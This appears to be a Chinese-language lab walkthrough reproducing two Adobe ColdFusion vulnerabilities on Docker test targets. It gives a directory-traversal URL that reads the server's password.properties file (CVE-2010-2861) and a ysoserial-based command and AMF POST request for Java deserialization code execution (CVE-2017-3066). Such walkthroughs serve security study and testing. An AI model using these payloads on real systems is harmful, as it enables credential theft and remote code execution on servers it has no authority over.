前言
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
一、CVE-2010-2861_文件读取
靶场:192.168.4.23_ubuntu
1. 漏洞原理
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
2. 环境搭建
#sudo docker-compose up -d
3. 漏洞复现
环境初始化,访问`http://your-ip:8500/CFIDE/administrator/index.cfm`,输入密码`admin`,即可。
http://192.168.4.23:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
二、CVE-2017-3066_Adobe ColdFusion 反序列化漏洞
靶 ?场:192.168.4.10_ubuntu
攻击机:192.168.4.29_kali
1. 漏洞原理
Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。
2. 环境搭建
#sudo docker-compose up -d
3. 漏洞复现
环境初始化
访问`http://your-ip:8500/CFIDE/administrator/index.cfm`,输入密码`vulhub`。
生成POC
#java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-8eb5cbfbf6-1.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
构造数据包,使用上面生成的poc.ser,使用导入文件导入poc数据包,
发送
POST /flex2gateway/amf HTTP/1.1
Host: 192.168.4.10:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853
‘POC’
?
创建成功
?